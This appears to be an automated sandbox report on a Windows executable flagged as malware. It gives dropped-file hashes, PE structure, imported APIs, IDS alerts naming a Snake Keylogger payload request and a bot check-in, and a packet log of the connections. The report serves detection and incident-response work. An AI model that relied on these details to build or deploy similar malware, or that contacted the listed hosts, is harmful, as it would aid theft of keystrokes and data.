                                                                                              Preview:MSCF....\.......D................'..........\....#..........4...=....).........6.. .d3dx10_34_x64.cat.pa...).....6.. .d3dcompiler_34.dll.h...2......6.. .d3dx10_34.dll.h....F.....6.. .infinst.exe......X.....6.. .d3dx10_34_x64.inf......Z.....6.. .d3dx10_34_x64_xp.inf./....\.....6.. .jun2007_d3dx10_34_x64.inf.........[.....p...R.P...>..s+..A.%..".J8.Z....B.Z......VR.!B.T%AP..H...1....0..~_.Z./_y.l.u....`..[r-..d.wj....B^.QrAc..-../?.....".......A....P4DP{....|.d.t..4.}.W58Ah)...TNRt......2$.....r..q .^...1....... .. 3..*.......|.J..=....N.KB|.{.J...W..1O....Z4...@H...T..p....0}.A...q..-B...I.($.J.K~..G.$..y....8.`$w@|..FO.Km.....#/.P4..3 P..by...e......O....(...]..P>(o..?...#t....P....?b/..(.............g.F*....|T.XPw.P..I.4..x..&PZ.C|8o......8I/..p.....K.(.'a...t.....A~.<.7.9.'...'.....O.p<EO......F.E........e...A{.@=.e...:..y.J......F.z...].......G..{...~z@...S$....'....p}..'......(#..(.......;.~.....hyXVfA............'h....nj.R.p,h........W......G.

                                                                                              C:\Windows\msdownld.tmp\AS46D685.tmp\Jun2007_xact_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 146949 bytes, 6 files, at 0x44 +A "xact2_8_x86.cat" +A "x3daudio1_2.dll", flags 0x4, ID 9016, number 1, extra bytes 20 in head, 10 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):156117
                                                                                              Entropy (8bit):7.994909703055095
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:tG7RXkNHRrOaYVD5yEThWmLksx2MeEm6oOD4+3y20OXtGhlYRTPZDT5P/lJXptA:eX8KVD5yETfLksAMUHo4+T5IhlYRDZDy
                                                                                              MD5:001CFF513A31EE082133E7BA3B0D71A2
                                                                                              SHA1:4517610A25239A16C26CA9890E1F0E52DDA3781A
                                                                                              SHA-256:245B0C554CBE2677939A70E5C4C6666B1B43D10D47980223F8CDEADB2D0EB76B
                                                                                              SHA-512:7119F6CA16FE6D968310F34828F30D8144531B89583CFD529056D2E31D5164FC65136FA9015B69849F724EC641A9291AC644C91CC3FA8EBDD4DAF9CF5A665A7F
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....>......D...............8#...........>...#...................).........6.. .xact2_8_x86.cat.hG...).....6.. .x3daudio1_2.dll.h...*q.....6. .xactengine2_8.dll.o..........6.. .jun2007_xact_x86.inf............6.. .xact2_8_x86.inf............6.. .xact2_8_x86_xp.inf......4..CK.|.@S..I..........c....B(..........A..{..b...;XA.`.r,...Q..l.gO@.|....w....svw........8........:.~P.t..d.....T..+GIQah7......_WT..H.S2.)...R@..0...L...R+.;..=.....\.).Y.K.c.1..q.M.&.c9.:.S.WZ.'.b@.2.....q..].1!.F.=.`v.)..9.....1y...&P.....,IN.f.q...}8*.......p......... .~...;.8.'...PC...L...F....F.R1N.1....8...I..*.FU((........X(...bQ.......G.......O...`lj..F.l.>..AS.t/s._.!..{Rv!\MArc.DR.AZ.P....=`..{....-j..!M]..0.o.'gX.L..R..:...k<-.....p.......... .1)....m3.).._1..K.R7.@n.7.......0&d.....,..a.L.I,...?..>..F..8l.....=7Gr?.*.`../...!.9...0o,.s.^I.QT:..Q.t.........D.IR...b,..V[..M....j.....?.I.$..w`.#..\....B.aX{.C....V7.P7.P..P.$..V....AL..I.X@.R.TU.......^.k..{..|...:..8.

                                                                                              C:\Windows\msdownld.tmp\AS46DD5B.tmp\Jun2007_xact_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 191162 bytes, 7 files, at 0x44 +A "xact2_8_x64.cat" +A "x3daudio1_2.dll", flags 0x4, ID 10131, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):200354
                                                                                              Entropy (8bit):7.996324633982409
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:Oxuwfa4lebkGyR+DPZLOYZ9lD7baC+PJEDzfYPO6quXhBhYDLk0siPnJ8WKKiu:Oja4WkNWOYxX1+++vRB200ssJ8G
                                                                                              MD5:B9648D12DF695290BE0479C1E78894C7
                                                                                              SHA1:932627D40A83411F9F4006792ADEEB4C3A74CF37
                                                                                              SHA-256:3F2CA0ACCEF2594FB014296F4111B7FBB59729C5D928B22F7283C392494FEE7C
                                                                                              SHA-512:240B622B02C5FA3D036043ECBE5BF29FEE447147AF36E795BFAE83FAFA35934FC22A3E9CC2D846BD880D7808897355E16696C555146EE69864472D4600AD25B6
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................'...............#..........*........).........6.. .xact2_8_x64.cat.hS...).....6.. .x3daudio1_2.dll.hA..*}.....6". .xactengine2_8.dll.h..........6.. .infinst.exe............6.. .jun2007_xact_x64.inf............6.. .xact2_8_x64.inf.%..........6.. .xact2_8_x64_xp.inf.g@../..[.........R.P...?...XZ.R+...k...h...T.N.B..)...HX.F...J.V..Ty......hD......}.Q.I..lb...^.+..v.;.U.F..i.-.....4........B.$._H...@`................P..7.....,$0...Z/...1+.#.*......tAK.....^.$:.. .G..ma.....B.:<Lv!..p....I...a.A.C$.:....I..$?..I8T-u....o......1,"(CA.....!.(I@.yB......W..@.<3.!.(....1u!........@..y<....@d....2?I..d.ax.....@..WA.2..\....S...z........8.|..'......yD.y...............A'$..A(8.H3'S.#>.P...@..f.8....._..`...(f.'?T....Q..Y.Y.Es..............u(..@...'..zu ...?."(.v.. .=..p%.~..X.;.........g.......+...O...P\\....Y....~H......yd....u.v~y .... .z.B.*...0...! "..b7/..v..J...{...A...~.!y..O=...sR.Uy..>..$L$0.&2`.p..2M.v} p'l...*.....w....'..}.

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):7.037746245684915
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 93.21%
                                                                                              • Win32 Executable Borland Delphi 7 (665061/41) 6.20%
                                                                                              • InstallShield setup (43055/19) 0.40%
                                                                                              • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                              File name:file.exe
                                                                                              File size:1'059'840 bytes
                                                                                              MD5:eaba5b2c3b6607177112ec5f26438ba3
                                                                                              SHA1:d0572bad54faca6af612763c6835feb160a3dcd2
                                                                                              SHA256:43555b4a8bd82abd7e7b1f279b4f31afb5a230ce4246be6fda4fdd5e7263c780
                                                                                              SHA512:b767a6f167a0153628ae0bdb468eef4d4311e48a58ff4774843ee36321c48823a24be5c9d0d399800a19733a46ead5109cd54e728e6a260107212647a5f60d9c
                                                                                              SSDEEP:24576:6nsJ39LyjbJkQFMhmC+6GD9DukDF4zARUwSp:6nsHyjtk2MYC5GDFuRzmUd
                                                                                              TLSH:23359E22F2D18437D1721B3C9CAB93A5583ABE512E387A4E7BF91D4C4E3968178253D3
                                                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                              File Icon

                                                                                              Icon Hash:878fd7f3b9353593

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x49ab80
                                                                                              Entrypoint Section:CODE
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                              DLL Characteristics:
                                                                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:332f7ce65ead0adfb3d35147033aabe9

                                                                                              Entrypoint Preview

                                                                                              Instruction
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              add esp, FFFFFFF0h
                                                                                              mov eax, 0049A778h
                                                                                              call 00007F15DC78661Dh
                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                              mov eax, dword ptr [eax]
                                                                                              call 00007F15DC7D9F65h
                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                              mov eax, dword ptr [eax]
                                                                                              mov edx, 0049ABE0h
                                                                                              call 00007F15DC7D9B64h
                                                                                              mov ecx, dword ptr [0049DBDCh]
                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                              mov eax, dword ptr [eax]
                                                                                              mov edx, dword ptr [00496590h]
                                                                                              call 00007F15DC7D9F54h
                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                              mov eax, dword ptr [eax]
                                                                                              call 00007F15DC7D9FC8h
                                                                                              call 00007F15DC7840FBh
                                                                                              add byte ptr [eax], al

                                                                                              Data Directories

                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa00000x2a42.idata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x58288.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xa50000xa980.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0xa40180x21.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0xa40000x18.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                              Sections

                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              CODE0x10000x99bec0x99c0033fbe30e8a64654287edd1bf05ae7c8cFalse0.5141641260162602data6.572957870355296IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              DATA0x9b0000x2e540x30001f5e19e7d20c1d128443d738ac7bc610False0.453125data4.854620797809023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              BSS0x9e0000x11e50x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .idata0xa00000x2a420x2c0021ff53180b390dc06e3a1adf0e57a073False0.3537819602272727data4.919333216027082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .tls0xa30000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rdata0xa40000x390x200a92cf494c617731a527994013429ad97False0.119140625MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"0.7846201577093705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                              .reloc0xa50000xa9800xaa00dcd1b1c3f3d28d444920211170d1e8e6False0.5899816176470588data6.674124985579511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                              .rsrc0xb00000x582880x58400c857884e8c6f99827f033b83788aea21False0.7942938872167139data7.438111819013504IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                              Resources

                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_CURSOR0xb0dc80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                              RT_CURSOR0xb0efc0x134data0.4642857142857143
                                                                                              RT_CURSOR0xb10300x134data0.4805194805194805
                                                                                              RT_CURSOR0xb11640x134data0.38311688311688313
                                                                                              RT_CURSOR0xb12980x134data0.36038961038961037
                                                                                              RT_CURSOR0xb13cc0x134data0.4090909090909091
                                                                                              RT_CURSOR0xb15000x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                              RT_BITMAP0xb16340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                              RT_BITMAP0xb18040x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                                                              RT_BITMAP0xb19e80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                              RT_BITMAP0xb1bb80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                                                              RT_BITMAP0xb1d880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                                                              RT_BITMAP0xb1f580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                                                              RT_BITMAP0xb21280x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                                              RT_BITMAP0xb22f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                              RT_BITMAP0xb24c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                                              RT_BITMAP0xb26980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                              RT_BITMAP0xb28680xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                              RT_ICON0xb29500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.07223264540337711
                                                                                              RT_ICON0xb39f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 8192TurkishTurkey0.2101313320825516
                                                                                              RT_DIALOG0xb4aa00x52data0.7682926829268293
                                                                                              RT_STRING0xb4af40x358data0.3796728971962617
                                                                                              RT_STRING0xb4e4c0x428data0.37406015037593987
                                                                                              RT_STRING0xb52740x3a4data0.40879828326180256
                                                                                              RT_STRING0xb56180x3bcdata0.33472803347280333
                                                                                              RT_STRING0xb59d40x2d4data0.4654696132596685
                                                                                              RT_STRING0xb5ca80x334data0.42804878048780487
                                                                                              RT_STRING0xb5fdc0x42cdata0.42602996254681647
                                                                                              RT_STRING0xb64080x1f0data0.4213709677419355
                                                                                              RT_STRING0xb65f80x1c0data0.44419642857142855
                                                                                              RT_STRING0xb67b80xdcdata0.6
                                                                                              RT_STRING0xb68940x320data0.45125
                                                                                              RT_STRING0xb6bb40xd8data0.5879629629629629
                                                                                              RT_STRING0xb6c8c0x118data0.5678571428571428
                                                                                              RT_STRING0xb6da40x268data0.4707792207792208
                                                                                              RT_STRING0xb700c0x3f8data0.37598425196850394
                                                                                              RT_STRING0xb74040x378data0.41103603603603606
                                                                                              RT_STRING0xb777c0x380data0.35379464285714285
                                                                                              RT_STRING0xb7afc0x374data0.4061085972850679
                                                                                              RT_STRING0xb7e700xe0data0.5535714285714286
                                                                                              RT_STRING0xb7f500xbcdata0.526595744680851
                                                                                              RT_STRING0xb800c0x368data0.40940366972477066
                                                                                              RT_STRING0xb83740x3fcdata0.34901960784313724
                                                                                              RT_STRING0xb87700x2fcdata0.36649214659685864
                                                                                              RT_STRING0xb8a6c0x354data0.31572769953051644
                                                                                              RT_RCDATA0xb8dc00x44data0.8676470588235294
                                                                                              RT_RCDATA0xb8e040x10data1.5
                                                                                              RT_RCDATA0xb8e140x46558PE32 executable (GUI) Intel 80386, for MS Windows, MS CAB-Installer self-extracting archive0.8737573241509539
                                                                                              RT_RCDATA0xff36c0x3ASCII text, with no line terminatorsTurkishTurkey3.6666666666666665
                                                                                              RT_RCDATA0xff3700x3c00PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsTurkishTurkey0.54296875
                                                                                              RT_RCDATA0x102f700x64cdata0.5998759305210918
                                                                                              RT_RCDATA0x1035bc0x153Delphi compiled form 'TFormVir'0.7522123893805309
                                                                                              RT_RCDATA0x1037100x47d3Microsoft Excel 2007+TurkishTurkey0.8675150921846957
                                                                                              RT_GROUP_CURSOR0x107ee40x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                              RT_GROUP_CURSOR0x107ef80x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                              RT_GROUP_CURSOR0x107f0c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                              RT_GROUP_CURSOR0x107f200x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                              RT_GROUP_CURSOR0x107f340x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                              RT_GROUP_CURSOR0x107f480x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                              RT_GROUP_CURSOR0x107f5c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                              RT_GROUP_ICON0x107f700x14dataTurkishTurkey1.1
                                                                                              RT_VERSION0x107f840x304dataTurkishTurkey0.42875647668393785

                                                                                              Imports

                                                                                              DLLImport
                                                                                              kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                              user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                              oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                              kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                              advapi32.dllRegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
                                                                                              kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
                                                                                              version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                              gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                              user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                              ole32.dllCLSIDFromString
                                                                                              kernel32.dllSleep
                                                                                              oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                              ole32.dllCLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
                                                                                              oleaut32.dllGetErrorInfo, SysFreeString
                                                                                              comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                              shell32.dllShellExecuteExA, ExtractIconExW
                                                                                              wininet.dllInternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
                                                                                              shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
                                                                                              advapi32.dllOpenSCManagerA, CloseServiceHandle
                                                                                              wsock32.dllWSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
                                                                                              netapi32.dllNetbios

                                                                                              Possible Origin

                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              TurkishTurkey

                                                                                              Network Behavior

                                                                                              Suricata IDS Alerts

                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2025-01-02T20:37:53.589740+01002832617ETPRO MALWARE W32.Bloat-A Checkin1192.168.2.54971069.42.215.25280TCP
                                                                                              2025-01-02T20:38:52.933059+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.550021142.250.184.238443TCP

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jan 2, 2025 20:37:52.961759090 CET4971080192.168.2.569.42.215.252
                                                                                              Jan 2, 2025 20:37:52.966711044 CET804971069.42.215.252192.168.2.5
                                                                                              Jan 2, 2025 20:37:52.966860056 CET4971080192.168.2.569.42.215.252
                                                                                              Jan 2, 2025 20:37:52.967511892 CET4971080192.168.2.569.42.215.252
                                                                                              Jan 2, 2025 20:37:52.972306967 CET804971069.42.215.252192.168.2.5
                                                                                              Jan 2, 2025 20:37:53.589658022 CET804971069.42.215.252192.168.2.5
                                                                                              Jan 2, 2025 20:37:53.589740038 CET4971080192.168.2.569.42.215.252
                                                                                              Jan 2, 2025 20:38:23.590001106 CET804971069.42.215.252192.168.2.5
                                                                                              Jan 2, 2025 20:38:23.592152119 CET4971080192.168.2.569.42.215.252
                                                                                              Jan 2, 2025 20:38:51.889208078 CET50021443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:51.889269114 CET44350021142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:51.889324903 CET50021443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:51.899507046 CET50021443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:51.899528027 CET44350021142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:52.554207087 CET44350021142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:52.554311037 CET50021443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:52.554932117 CET44350021142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:52.554995060 CET50021443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:52.606677055 CET50021443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:52.606709003 CET44350021142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:52.606947899 CET44350021142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:52.607006073 CET50021443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:52.608402967 CET50021443192.168.2.5142.250.184.238
                                                                                              Jan 2, 2025 20:38:52.655328035 CET44350021142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:52.933087111 CET44350021142.250.184.238192.168.2.5
                                                                                              Jan 2, 2025 20:38:52.933152914 CET50021443192.168.2.5142.250.184.238
